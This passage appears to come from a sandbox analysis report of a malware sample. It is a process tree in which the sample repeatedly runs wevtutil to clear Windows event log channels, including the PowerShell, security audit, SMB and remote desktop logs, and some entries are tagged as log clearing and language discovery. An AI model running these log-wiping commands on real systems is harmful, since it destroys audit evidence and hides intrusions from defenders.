C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Diagnose"3⤵PID:6236
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PersistentMemory-ScmBus/Operational"3⤵PID:7852
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PhotoAcq/Analytic"3⤵PID:9620
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PlayToManager/Analytic"3⤵PID:8312
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Policy/Analytic"3⤵PID:10228
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Policy/Operational"3⤵PID:10448
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"3⤵PID:12244
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"3⤵PID:11932
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Power-Meter-Polling/Diagnostic"3⤵PID:9244
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerCfg/Diagnostic"3⤵
- Power Settings
PID:8396
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerCpl/Diagnostic"3⤵
- Clears Windows event logs
PID:3648
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:6884
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Analytic"3⤵PID:7596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Debug"3⤵PID:10592
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerShell-DesiredStateConfiguration-FileDownloadManager/Operational"3⤵PID:9292
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerShell/Admin"3⤵PID:5624
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerShell/Analytic"3⤵PID:10052
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerShell/Debug"3⤵PID:8704
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PowerShell/Operational"3⤵PID:7924
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PrimaryNetworkIcon/Performance"3⤵PID:3588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PrintBRM/Admin"3⤵PID:7588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PrintService-USBMon/Debug"3⤵PID:3360
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PrintService/Admin"3⤵PID:10352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PrintService/Debug"3⤵PID:10152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PrintService/Operational"3⤵PID:9464
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Privacy-Auditing/Operational"3⤵PID:6928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ProcessStateManager/Diagnostic"3⤵PID:1972
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/Analytic"3⤵PID:6564
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Program-Compatibility-Assistant/CompatAfterUpgrade"3⤵PID:10120
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"3⤵PID:10692
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/AutoPilot"3⤵PID:10888
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/Debug"3⤵PID:8180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Provisioning-Diagnostics-Provider/ManagementService"3⤵PID:7416
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Proximity-Common/Diagnostic"3⤵PID:5364
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Proximity-Common/Informational"3⤵PID:7108
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Proximity-Common/Performance"3⤵PID:6640
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PushNotification-Developer/Debug"3⤵
- System Location Discovery: System Language Discovery
PID:9300
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PushNotification-InProc/Debug"3⤵
- System Location Discovery: System Language Discovery
PID:11740
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Admin"3⤵PID:10596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Debug"3⤵PID:9916
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-PushNotification-Platform/Operational"3⤵PID:3748
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-QoS-Pacer/Diagnostic"3⤵PID:6260
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-QoS-qWAVE/Debug"3⤵PID:6392
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RPC-Proxy/Debug"3⤵PID:10584
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RPC/Debug"3⤵PID:7140
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RPC/EEInfo"3⤵
- System Location Discovery: System Language Discovery
PID:9192
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RRAS/Debug"3⤵PID:5412
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RRAS/Operational"3⤵PID:7324
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RadioManager/Analytic"3⤵PID:9056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"3⤵PID:8060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Debug"3⤵PID:7528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RasAgileVpn/Operational"3⤵PID:9348
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ReFS/Operational"3⤵PID:7576
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ReadyBoost/Analytic"3⤵PID:7492
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ReadyBoost/Operational"3⤵PID:7032
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Analytic"3⤵PID:7716
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ReadyBoostDriver/Operational"3⤵PID:6832
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Regsvr32/Operational"3⤵PID:7992
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Admin"3⤵PID:6516
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteApp and Desktop Connections/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:6912
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Admin"3⤵
- Clears Windows event logs
PID:4840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Operational"3⤵PID:10724
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteAssistance/Tracing"3⤵PID:9148
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"3⤵PID:9124
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"3⤵PID:6940
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational"3⤵PID:8388
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"3⤵PID:12044
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-Kernel-Mode-Transport/Debug"3⤵PID:10660
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-RemoteFX-VM-User-Mode-Transport/Debug"3⤵PID:10928
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"3⤵
- System Location Discovery: System Language Discovery
PID:7664
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Diagnostic"3⤵PID:9012
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Remotefs-Rdbss/Operational"3⤵PID:9628
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ResetEng-Trace/Diagnostic"3⤵PID:8756
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Detector/Operational"3⤵PID:5632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"3⤵PID:2484
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ResourcePublication/Tracing"3⤵PID:10556
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RestartManager/Operational"3⤵PID:4452
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RetailDemo/Admin"3⤵PID:2240
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-RetailDemo/Operational"3⤵PID:7856
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Graphics/Analytic"3⤵PID:10492
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"3⤵PID:5548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Networking/Tracing"3⤵PID:9384
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Web-Http/Tracing"3⤵PID:3220
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-WebAPI/Tracing"3⤵PID:10380
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"3⤵
- Clears Windows event logs
PID:7592
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTCaptureEngine"3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:11040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTMediaStreamSource"3⤵PID:6548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime-Windows-Media/WinRTTranscode"3⤵PID:7500
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime/CreateInstance"3⤵PID:7900
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Runtime/Error"3⤵PID:6796
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBClient/Analytic"3⤵PID:7304
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBClient/HelperClassDiagnostic"3⤵PID:7048
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"3⤵PID:8068
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBClient/Operational"3⤵PID:8856
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBDirect/Admin"3⤵PID:6208
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBDirect/Debug"3⤵PID:2512
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBDirect/Netmon"3⤵PID:8588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Analytic"3⤵PID:11000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Audit"3⤵PID:6408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Connectivity"3⤵PID:7252
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Diagnostic"3⤵PID:6776
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Operational"3⤵PID:9136
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Performance"3⤵PID:11124
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBServer/Security"3⤵PID:6164
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Admin"3⤵PID:4236
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SMBWitnessClient/Informational"3⤵PID:10740
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SPB-ClassExtension/Analytic"3⤵PID:7424
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SPB-HIDI2C/Analytic"3⤵PID:9316
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Schannel-Events/Perf"3⤵PID:6992
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sdbus/Analytic"3⤵PID:11168
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sdbus/Debug"3⤵PID:9552
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sdstor/Analytic"3⤵
- System Location Discovery: System Language Discovery
PID:2352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Search-Core/Diagnostic"3⤵PID:6316
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Search-ProtocolHandlers/Diagnostic"3⤵PID:10016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SearchUI/Diagnostic"3⤵PID:9276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SearchUI/Operational"3⤵PID:7772
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecureAssessment/Operational"3⤵PID:7004
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Adminless/Operational"3⤵PID:6892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Diagnostic"3⤵PID:8532
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Audit-Configuration-Client/Operational"3⤵PID:12016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-EnterpriseData-FileRevocationManager/Operational"3⤵PID:9840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Operational"3⤵PID:8596
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-ExchangeActiveSyncProvisioning/Performance"3⤵PID:8288
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-IdentityListener/Operational"3⤵PID:5408
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-IdentityStore/Performance"3⤵PID:8088
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-LessPrivilegedAppContainer/Operational"3⤵
- Clears Windows event logs
PID:8696
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Mitigations/KernelMode"3⤵PID:9160
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Mitigations/UserMode"3⤵PID:10668
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Netlogon/Operational"3⤵PID:10548
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GC/Analytic"3⤵PID:10620
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-GenuineCenter-Logging/Operational"3⤵
- Clears Windows event logs
PID:11060
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX-Notifications/ActionCenter"3⤵PID:9760
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP-UX/Analytic"3⤵PID:6932
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-SPP/Perf"3⤵PID:8468
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-UserConsentVerifier/Audit"3⤵PID:8920
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Security-Vault/Performance"3⤵PID:7580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Admin"3⤵PID:7872
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Operational"3⤵PID:6472
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SecurityMitigationsBroker/Perf"3⤵PID:8604
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SendTo/Diagnostic"3⤵PID:6440
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sens/Debug"3⤵PID:6528
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sensors/Debug"3⤵PID:10892
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Sensors/Performance"3⤵PID:11084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension-V2/Analytic"3⤵PID:7276
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Serial-ClassExtension/Analytic"3⤵PID:7620
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ServiceReportingApi/Debug"3⤵PID:8812
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Services-Svchost/Diagnostic"3⤵PID:9580
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Services/Diagnostic"3⤵PID:10084
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Servicing/Debug"3⤵
- Clears Windows event logs
PID:11244
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Debug"3⤵PID:6752
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-Azure/Operational"3⤵PID:8016
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Analytic"3⤵PID:6720
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Debug"3⤵PID:8568
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync-OneDrive/Operational"3⤵PID:8780
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/Analytic"3⤵PID:8436
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/Debug"3⤵PID:9032
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/Operational"3⤵PID:5352
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SettingSync/VerboseDebug"3⤵PID:8716
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Setup/Analytic"3⤵PID:10280
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupCl/Analytic"3⤵PID:10704
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupPlatform/Analytic"3⤵PID:11108
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupQueue/Analytic"3⤵
- Clears Windows event logs
PID:7668
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SetupUGC/Analytic"3⤵PID:9876
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"3⤵PID:3824
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AppWizCpl/Diagnostic"3⤵PID:10840
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-BootAnim/Diagnostic"3⤵
- Clears Windows event logs
PID:10040
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Common/Diagnostic"3⤵
- System Location Discovery: System Language Discovery
PID:8916
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"3⤵PID:9804
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-CredentialProviderUser/Diagnostic"3⤵PID:8496
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Logon/Diagnostic"3⤵PID:9444
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-LogonUI/Diagnostic"3⤵
- Clears Windows event logs
PID:8632
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"3⤵PID:10664
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"3⤵PID:9692
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/ActionCenter"3⤵PID:7988
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/AppDefaults"3⤵PID:7064
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/Diagnostic"3⤵
- Clears Windows event logs
PID:8176
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/LogonTasksChannel"3⤵PID:6820
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Core/Operational"3⤵PID:9832
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-DefaultPrograms/Diagnostic"3⤵PID:10180
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-LockScreenContent/Diagnostic"3⤵PID:8044
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-OpenWith/Diagnostic"3⤵PID:11088
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-Shwebsvc"3⤵PID:10900
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shell-ZipFolder/Diagnostic"3⤵PID:7932
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Diagnostic"3⤵PID:7848
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-ShellCommon-StartLayoutPopulation/Operational"3⤵PID:6448
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Shsvcs/Diagnostic"3⤵PID:10644
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SleepStudy/Diagnostic"3⤵PID:8484
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmartCard-Audit/Authentication"3⤵PID:11600
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmartCard-DeviceEnum/Operational"3⤵PID:7524
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Admin"3⤵PID:8392
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmartCard-TPM-VCard-Module/Operational"3⤵PID:11820
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmartScreen/Debug"3⤵PID:6588
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmbClient/Audit"3⤵PID:1784
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmbClient/Connectivity"3⤵PID:6540
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmbClient/Diagnostic"3⤵PID:11056
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SmbClient/Security"3⤵PID:12000
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Speech-UserExperience/Diagnostic"3⤵
- Clears Windows event logs
- System Location Discovery: System Language Discovery
PID:7052
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Spell-Checking/Analytic"3⤵PID:8152
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SpellChecker/Analytic"3⤵PID:7648
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-Spellchecking-Host/Analytic"3⤵PID:10184
-
-
C:\Windows\SysWOW64\wevtutil.exeWEVTUTIL CL "Microsoft-Windows-SruMon/Diagnostic"3⤵PID:7224
-
-
